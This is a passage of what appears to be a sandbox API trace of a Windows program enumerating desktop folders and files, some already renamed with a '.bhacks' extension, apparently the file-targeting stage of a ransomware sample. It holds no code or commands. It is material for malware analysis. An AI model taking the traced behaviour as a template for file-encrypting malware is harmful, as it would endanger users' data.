ftCreationTime.dwLowDateTime=0x6c15f530, ftCreationTime.dwHighDateTime=0x1d5d49d, ftLastAccessTime.dwLowDateTime=0x2fe34c90, ftLastAccessTime.dwHighDateTime=0x1d5d801, ftLastWriteTime.dwLowDateTime=0x2fe34c90, ftLastWriteTime.dwHighDateTime=0x1d5d801, nFileSizeHigh=0x0, nFileSizeLow=0x6236, dwReserved0=0x0, dwReserved1=0x0, cFileName="vY9PyxRY3.odp", cAlternateFileName="VY9PYX~1.ODP")) returned 1 [0066.371] FindNextFileW (in: hFindFile=0x9bed20, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x241cd0f6, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x241cd0f6, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2421963f, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x3450, dwReserved0=0x0, dwReserved1=0x0, cFileName="W3nCKPmZd6_T8yGD3CRn.jpg.bhacks", cAlternateFileName="W3NCKP~1.BHA")) returned 1 [0066.371] FindNextFileW (in: hFindFile=0x9bed20, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb154e40, ftCreationTime.dwHighDateTime=0x1d5ce80, ftLastAccessTime.dwLowDateTime=0x71f710b0, ftLastAccessTime.dwHighDateTime=0x1d5d263, ftLastWriteTime.dwLowDateTime=0x71f710b0, ftLastWriteTime.dwHighDateTime=0x1d5d263, nFileSizeHigh=0x0, nFileSizeLow=0xa113, dwReserved0=0x0, dwReserved1=0x0, cFileName="WLViPvkU.mp4", cAlternateFileName="")) returned 1 [0066.371] FindNextFileW (in: hFindFile=0x9bed20, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2aa462e0, ftCreationTime.dwHighDateTime=0x1d5d5b9, ftLastAccessTime.dwLowDateTime=0x2451772f, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2451772f, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="yi TyUTEx1dVRHalW", cAlternateFileName="YITYUT~1")) returned 1 [0066.371] FindNextFileW (in: hFindFile=0x9bed20, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc92ca540, ftCreationTime.dwHighDateTime=0x1d5c8c0, ftLastAccessTime.dwLowDateTime=0xc2425e30, ftLastAccessTime.dwHighDateTime=0x1d5c9e9, ftLastWriteTime.dwLowDateTime=0xc2425e30, ftLastWriteTime.dwHighDateTime=0x1d5c9e9, nFileSizeHigh=0x0, nFileSizeLow=0xcf42, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZvWDNly8ss.csv", cAlternateFileName="ZVWDNL~1.CSV")) returned 1 [0066.371] FindNextFileW (in: hFindFile=0x9bed20, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc92ca540, ftCreationTime.dwHighDateTime=0x1d5c8c0, ftLastAccessTime.dwLowDateTime=0xc2425e30, ftLastAccessTime.dwHighDateTime=0x1d5c9e9, ftLastWriteTime.dwLowDateTime=0xc2425e30, ftLastWriteTime.dwHighDateTime=0x1d5c9e9, nFileSizeHigh=0x0, nFileSizeLow=0xcf42, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZvWDNly8ss.csv", cAlternateFileName="ZVWDNL~1.CSV")) returned 0 [0066.371] FindClose (in: hFindFile=0x9bed20 | out: hFindFile=0x9bed20) returned 1 [0066.372] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\*.mp4", lpFindFileData=0x6fe810 | out: lpFindFileData=0x6fe810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b501110, ftCreationTime.dwHighDateTime=0x1d5d535, ftLastAccessTime.dwLowDateTime=0xa751ce0, ftLastAccessTime.dwHighDateTime=0x1d5cba4, ftLastWriteTime.dwLowDateTime=0xa751ce0, ftLastWriteTime.dwHighDateTime=0x1d5cba4, nFileSizeHigh=0x0, nFileSizeLow=0x454f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kz5g.mp4", cAlternateFileName="")) returned 0x9bf080 [0066.372] FindNextFileW (in: hFindFile=0x9bf080, lpFindFileData=0x6fe840 | out: lpFindFileData=0x6fe840*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e6a2940, ftCreationTime.dwHighDateTime=0x1d5d2ed, ftLastAccessTime.dwLowDateTime=0xbbd52910, ftLastAccessTime.dwHighDateTime=0x1d5c822, ftLastWriteTime.dwLowDateTime=0xbbd52910, ftLastWriteTime.dwHighDateTime=0x1d5c822, nFileSizeHigh=0x0, nFileSizeLow=0xb5e3, dwReserved0=0x0, dwReserved1=0x0, cFileName="nYVw1n1XTh2-sApcS7w.mp4", cAlternateFileName="NYVW1N~1.MP4")) returned 1 [0066.372] FindNextFileW (in: hFindFile=0x9bf080, lpFindFileData=0x6fe840 | out: lpFindFileData=0x6fe840*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb154e40, ftCreationTime.dwHighDateTime=0x1d5ce80, ftLastAccessTime.dwLowDateTime=0x71f710b0, ftLastAccessTime.dwHighDateTime=0x1d5d263, ftLastWriteTime.dwLowDateTime=0x71f710b0, ftLastWriteTime.dwHighDateTime=0x1d5d263, nFileSizeHigh=0x0, nFileSizeLow=0xa113, dwReserved0=0x0, dwReserved1=0x0, cFileName="WLViPvkU.mp4", cAlternateFileName="")) returned 1 [0066.372] FindNextFileW (in: hFindFile=0x9bf080, lpFindFileData=0x6fe840 | out: lpFindFileData=0x6fe840*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0066.372] FindClose (in: hFindFile=0x9bf080 | out: hFindFile=0x9bf080) returned 1 [0066.372] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6\\*", lpFindFileData=0x6fe790 | out: lpFindFileData=0x6fe790*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5fad9210, ftCreationTime.dwHighDateTime=0x1d5cdab, ftLastAccessTime.dwLowDateTime=0xc7ac12f0, ftLastAccessTime.dwHighDateTime=0x1d5d0c7, ftLastWriteTime.dwLowDateTime=0xc7ac12f0, ftLastWriteTime.dwHighDateTime=0x1d5d0c7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x9be5a0 [0066.373] FindNextFileW (in: hFindFile=0x9be5a0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5fad9210, ftCreationTime.dwHighDateTime=0x1d5cdab, ftLastAccessTime.dwLowDateTime=0xc7ac12f0, ftLastAccessTime.dwHighDateTime=0x1d5d0c7, ftLastWriteTime.dwLowDateTime=0xc7ac12f0, ftLastWriteTime.dwHighDateTime=0x1d5d0c7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.373] FindNextFileW (in: hFindFile=0x9be5a0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a026230, ftCreationTime.dwHighDateTime=0x1d5c8dc, ftLastAccessTime.dwLowDateTime=0xce447400, ftLastAccessTime.dwHighDateTime=0x1d5d6f2, ftLastWriteTime.dwLowDateTime=0xce447400, ftLastWriteTime.dwHighDateTime=0x1d5d6f2, nFileSizeHigh=0x0, nFileSizeLow=0x619e, dwReserved0=0x0, dwReserved1=0x0, cFileName="5E4_Kcg6cqpR-gwb.swf", cAlternateFileName="5E4_KC~1.SWF")) returned 1 [0066.373] FindNextFileW (in: hFindFile=0x9be5a0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xccb40900, ftCreationTime.dwHighDateTime=0x1d5d73f, ftLastAccessTime.dwLowDateTime=0xdb0cc290, ftLastAccessTime.dwHighDateTime=0x1d5d0cc, ftLastWriteTime.dwLowDateTime=0xdb0cc290, ftLastWriteTime.dwHighDateTime=0x1d5d0cc, nFileSizeHigh=0x0, nFileSizeLow=0x15772, dwReserved0=0x0, dwReserved1=0x0, cFileName="6xiRzqk0e.mp3", cAlternateFileName="6XIRZQ~1.MP3")) returned 1 [0066.373] FindNextFileW (in: hFindFile=0x9be5a0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf01d96e0, ftCreationTime.dwHighDateTime=0x1d5d6ea, ftLastAccessTime.dwLowDateTime=0x726bd8e0, ftLastAccessTime.dwHighDateTime=0x1d5c85a, ftLastWriteTime.dwLowDateTime=0x726bd8e0, ftLastWriteTime.dwHighDateTime=0x1d5c85a, nFileSizeHigh=0x0, nFileSizeLow=0xbe65, dwReserved0=0x0, dwReserved1=0x0, cFileName="FisMdRNWBNOEJ4Av.swf", cAlternateFileName="FISMDR~1.SWF")) returned 1 [0066.373] FindNextFileW (in: hFindFile=0x9be5a0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7febd840, ftCreationTime.dwHighDateTime=0x1d5d678, ftLastAccessTime.dwLowDateTime=0x2be003f0, ftLastAccessTime.dwHighDateTime=0x1d5d729, ftLastWriteTime.dwLowDateTime=0x2be003f0, ftLastWriteTime.dwHighDateTime=0x1d5d729, nFileSizeHigh=0x0, nFileSizeLow=0x7812, dwReserved0=0x0, dwReserved1=0x0, cFileName="JFBPLC7ZEPj.ppt", cAlternateFileName="JFBPLC~1.PPT")) returned 1 [0066.373] FindNextFileW (in: hFindFile=0x9be5a0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd50430, ftCreationTime.dwHighDateTime=0x1d5d21c, ftLastAccessTime.dwLowDateTime=0xf6f6dab0, ftLastAccessTime.dwHighDateTime=0x1d5ce31, ftLastWriteTime.dwLowDateTime=0xf6f6dab0, ftLastWriteTime.dwHighDateTime=0x1d5ce31, nFileSizeHigh=0x0, nFileSizeLow=0x42b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="RJ4fo8BlUIkNkFgvJDB3.wav", cAlternateFileName="RJ4FO8~1.WAV")) returned 1 [0066.373] FindNextFileW (in: hFindFile=0x9be5a0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14a3e890, ftCreationTime.dwHighDateTime=0x1d5cc94, ftLastAccessTime.dwLowDateTime=0x248f4274, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x248f4274, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="uqU-SQkb", cAlternateFileName="")) returned 1 [0066.374] FindNextFileW (in: hFindFile=0x9be5a0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14a3e890, ftCreationTime.dwHighDateTime=0x1d5cc94, ftLastAccessTime.dwLowDateTime=0x248f4274, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x248f4274, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="uqU-SQkb", cAlternateFileName="")) returned 0 [0066.374] FindClose (in: hFindFile=0x9be5a0 | out: hFindFile=0x9be5a0) returned 1 [0066.374] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6\\*.mp4", lpFindFileData=0x6fe810 | out: lpFindFileData=0x6fe810*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0066.374] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6\\uqU-SQkb\\*", lpFindFileData=0x6fe790 | out: lpFindFileData=0x6fe790*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14a3e890, ftCreationTime.dwHighDateTime=0x1d5cc94, ftLastAccessTime.dwLowDateTime=0x248f4274, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x248f4274, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x9bede0 [0066.374] FindNextFileW (in: hFindFile=0x9bede0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14a3e890, ftCreationTime.dwHighDateTime=0x1d5cc94, ftLastAccessTime.dwLowDateTime=0x248f4274, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x248f4274, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.374] FindNextFileW (in: hFindFile=0x9bede0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6bda560, ftCreationTime.dwHighDateTime=0x1d5c954, ftLastAccessTime.dwLowDateTime=0xb7ba9f80, ftLastAccessTime.dwHighDateTime=0x1d5cd4b, ftLastWriteTime.dwLowDateTime=0xb7ba9f80, ftLastWriteTime.dwHighDateTime=0x1d5cd4b, nFileSizeHigh=0x0, nFileSizeLow=0x3271, dwReserved0=0x0, dwReserved1=0x0, cFileName="DOdivRJBTXgzUJ.wav", cAlternateFileName="DODIVR~1.WAV")) returned 1 [0066.375] FindNextFileW (in: hFindFile=0x9bede0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2464586c, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x2464586c, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2485b8b7, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0xb4f0, dwReserved0=0x0, dwReserved1=0x0, cFileName="E2jRFWUv.xlsx.bhacks", cAlternateFileName="E2JRFW~1.BHA")) returned 1 [0066.375] FindNextFileW (in: hFindFile=0x9bede0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd9298a40, ftCreationTime.dwHighDateTime=0x1d5cdc4, ftLastAccessTime.dwLowDateTime=0xb615c9a0, ftLastAccessTime.dwHighDateTime=0x1d5d360, ftLastWriteTime.dwLowDateTime=0xb615c9a0, ftLastWriteTime.dwHighDateTime=0x1d5d360, nFileSizeHigh=0x0, nFileSizeLow=0x68aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="krWg9z-VUaci.wav", cAlternateFileName="KRWG9Z~1.WAV")) returned 1 [0066.375] FindNextFileW (in: hFindFile=0x9bede0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5714a10, ftCreationTime.dwHighDateTime=0x1d5d59b, ftLastAccessTime.dwLowDateTime=0xafa97800, ftLastAccessTime.dwHighDateTime=0x1d5d2cf, ftLastWriteTime.dwLowDateTime=0xafa97800, ftLastWriteTime.dwHighDateTime=0x1d5d2cf, nFileSizeHigh=0x0, nFileSizeLow=0x10b8b, dwReserved0=0x0, dwReserved1=0x0, cFileName="KsPC3.bmp", cAlternateFileName="")) returned 1 [0066.375] FindNextFileW (in: hFindFile=0x9bede0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c0240, ftCreationTime.dwHighDateTime=0x1d5d7c3, ftLastAccessTime.dwLowDateTime=0x626ed2a0, ftLastAccessTime.dwHighDateTime=0x1d5ccb3, ftLastWriteTime.dwLowDateTime=0x626ed2a0, ftLastWriteTime.dwHighDateTime=0x1d5ccb3, nFileSizeHigh=0x0, nFileSizeLow=0xad34, dwReserved0=0x0, dwReserved1=0x0, cFileName="kZHWiDNy.mp4", cAlternateFileName="")) returned 1 [0066.375] FindNextFileW (in: hFindFile=0x9bede0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2d402a0, ftCreationTime.dwHighDateTime=0x1d5d269, ftLastAccessTime.dwLowDateTime=0x6cdeacf0, ftLastAccessTime.dwHighDateTime=0x1d5d1eb, ftLastWriteTime.dwLowDateTime=0x6cdeacf0, ftLastWriteTime.dwHighDateTime=0x1d5d1eb, nFileSizeHigh=0x0, nFileSizeLow=0xad19, dwReserved0=0x0, dwReserved1=0x0, cFileName="Oo6K.m4a", cAlternateFileName="")) returned 1 [0066.375] FindNextFileW (in: hFindFile=0x9bede0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcbaf9c0, ftCreationTime.dwHighDateTime=0x1d5d70b, ftLastAccessTime.dwLowDateTime=0x47b550f0, ftLastAccessTime.dwHighDateTime=0x1d5c91c, ftLastWriteTime.dwLowDateTime=0x47b550f0, ftLastWriteTime.dwHighDateTime=0x1d5c91c, nFileSizeHigh=0x0, nFileSizeLow=0x168cf, dwReserved0=0x0, dwReserved1=0x0, cFileName="TXjqoZIp1 VeX-aMqDQ6.bmp", cAlternateFileName="TXJQOZ~1.BMP")) returned 1 [0066.376] FindNextFileW (in: hFindFile=0x9bede0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcbaf9c0, ftCreationTime.dwHighDateTime=0x1d5d70b, ftLastAccessTime.dwLowDateTime=0x47b550f0, ftLastAccessTime.dwHighDateTime=0x1d5c91c, ftLastWriteTime.dwLowDateTime=0x47b550f0, ftLastWriteTime.dwHighDateTime=0x1d5c91c, nFileSizeHigh=0x0, nFileSizeLow=0x168cf, dwReserved0=0x0, dwReserved1=0x0, cFileName="TXjqoZIp1 VeX-aMqDQ6.bmp", cAlternateFileName="TXJQOZ~1.BMP")) returned 0 [0066.376] FindClose (in: hFindFile=0x9bede0 | out: hFindFile=0x9bede0) returned 1 [0066.376] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6\\uqU-SQkb\\*.mp4", lpFindFileData=0x6fe810 | out: lpFindFileData=0x6fe810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c0240, ftCreationTime.dwHighDateTime=0x1d5d7c3, ftLastAccessTime.dwLowDateTime=0x626ed2a0, ftLastAccessTime.dwHighDateTime=0x1d5ccb3, ftLastWriteTime.dwLowDateTime=0x626ed2a0, ftLastWriteTime.dwHighDateTime=0x1d5ccb3, nFileSizeHigh=0x0, nFileSizeLow=0xad34, dwReserved0=0x0, dwReserved1=0x0, cFileName="kZHWiDNy.mp4", cAlternateFileName="")) returned 0x9be6c0 [0066.376] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe840 | out: lpFindFileData=0x6fe840*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0066.376] FindClose (in: hFindFile=0x9be6c0 | out: hFindFile=0x9be6c0) returned 1 [0066.376] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\yi TyUTEx1dVRHalW\\*", lpFindFileData=0x6fe790 | out: lpFindFileData=0x6fe790*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2aa462e0, ftCreationTime.dwHighDateTime=0x1d5d5b9, ftLastAccessTime.dwLowDateTime=0x2451772f, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2451772f, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x9bf140 [0066.376] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2aa462e0, ftCreationTime.dwHighDateTime=0x1d5d5b9, ftLastAccessTime.dwLowDateTime=0x2451772f, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2451772f, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.377] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1418d380, ftCreationTime.dwHighDateTime=0x1d5ca0b, ftLastAccessTime.dwLowDateTime=0x9be42560, ftLastAccessTime.dwHighDateTime=0x1d5d165, ftLastWriteTime.dwLowDateTime=0x9be42560, ftLastWriteTime.dwHighDateTime=0x1d5d165, nFileSizeHigh=0x0, nFileSizeLow=0x15674, dwReserved0=0x0, dwReserved1=0x0, cFileName="7HlCuwMi.pptx", cAlternateFileName="7HLCUW~1.PPT")) returned 1 [0066.377] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58416d40, ftCreationTime.dwHighDateTime=0x1d5d368, ftLastAccessTime.dwLowDateTime=0x95e58810, ftLastAccessTime.dwHighDateTime=0x1d5d616, ftLastWriteTime.dwLowDateTime=0x95e58810, ftLastWriteTime.dwHighDateTime=0x1d5d616, nFileSizeHigh=0x0, nFileSizeLow=0x171e1, dwReserved0=0x0, dwReserved1=0x0, cFileName="CZR-hhw59bi.bmp", cAlternateFileName="CZR-HH~1.BMP")) returned 1 [0066.377] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x242b1fc1, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x242b1fc1, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x24370b6b, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x16750, dwReserved0=0x0, dwReserved1=0x0, cFileName="DN0hvZxxCeH-NYAF_H.png.bhacks", cAlternateFileName="DN0HVZ~1.BHA")) returned 1 [0066.377] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2ffd140, ftCreationTime.dwHighDateTime=0x1d5d3a0, ftLastAccessTime.dwLowDateTime=0xa565dfd0, ftLastAccessTime.dwHighDateTime=0x1d5c89f, ftLastWriteTime.dwLowDateTime=0xa565dfd0, ftLastWriteTime.dwHighDateTime=0x1d5c89f, nFileSizeHigh=0x0, nFileSizeLow=0xf21c, dwReserved0=0x0, dwReserved1=0x0, cFileName="dp gvQR2 MYwMzsW1yo.mkv", cAlternateFileName="DPGVQR~1.MKV")) returned 1 [0066.377] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x243e31c1, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x243e31c1, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2451772f, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0xa850, dwReserved0=0x0, dwReserved1=0x0, cFileName="iCkvEIW.png.bhacks", cAlternateFileName="ICKVEI~1.BHA")) returned 1 [0066.377] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x434c9c30, ftCreationTime.dwHighDateTime=0x1d5cc28, ftLastAccessTime.dwLowDateTime=0x11453020, ftLastAccessTime.dwHighDateTime=0x1d5cfa8, ftLastWriteTime.dwLowDateTime=0x11453020, ftLastWriteTime.dwHighDateTime=0x1d5cfa8, nFileSizeHigh=0x0, nFileSizeLow=0x4dcd, dwReserved0=0x0, dwReserved1=0x0, cFileName="kFQqlJY89ZuDyS.ppt", cAlternateFileName="KFQQLJ~1.PPT")) returned 1 [0066.378] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5061a0, ftCreationTime.dwHighDateTime=0x1d5cd77, ftLastAccessTime.dwLowDateTime=0xf08f0a70, ftLastAccessTime.dwHighDateTime=0x1d5cd33, ftLastWriteTime.dwLowDateTime=0xf08f0a70, ftLastWriteTime.dwHighDateTime=0x1d5cd33, nFileSizeHigh=0x0, nFileSizeLow=0x2338, dwReserved0=0x0, dwReserved1=0x0, cFileName="luPvkk7BP6.m4a", cAlternateFileName="LUPVKK~1.M4A")) returned 1 [0066.378] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49e65510, ftCreationTime.dwHighDateTime=0x1d5d6ee, ftLastAccessTime.dwLowDateTime=0x811c8ad0, ftLastAccessTime.dwHighDateTime=0x1d5cd8a, ftLastWriteTime.dwLowDateTime=0x811c8ad0, ftLastWriteTime.dwHighDateTime=0x1d5cd8a, nFileSizeHigh=0x0, nFileSizeLow=0x17e9b, dwReserved0=0x0, dwReserved1=0x0, cFileName="P-7IEYH2CNc0UByn.m4a", cAlternateFileName="P-7IEY~1.M4A")) returned 1 [0066.378] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49e65510, ftCreationTime.dwHighDateTime=0x1d5d6ee, ftLastAccessTime.dwLowDateTime=0x811c8ad0, ftLastAccessTime.dwHighDateTime=0x1d5cd8a, ftLastWriteTime.dwLowDateTime=0x811c8ad0, ftLastWriteTime.dwHighDateTime=0x1d5cd8a, nFileSizeHigh=0x0, nFileSizeLow=0x17e9b, dwReserved0=0x0, dwReserved1=0x0, cFileName="P-7IEYH2CNc0UByn.m4a", cAlternateFileName="P-7IEY~1.M4A")) returned 0 [0066.378] FindClose (in: hFindFile=0x9bf140 | out: hFindFile=0x9bf140) returned 1 [0066.378] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\yi TyUTEx1dVRHalW\\*.mp4", lpFindFileData=0x6fe810 | out: lpFindFileData=0x6fe810*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, 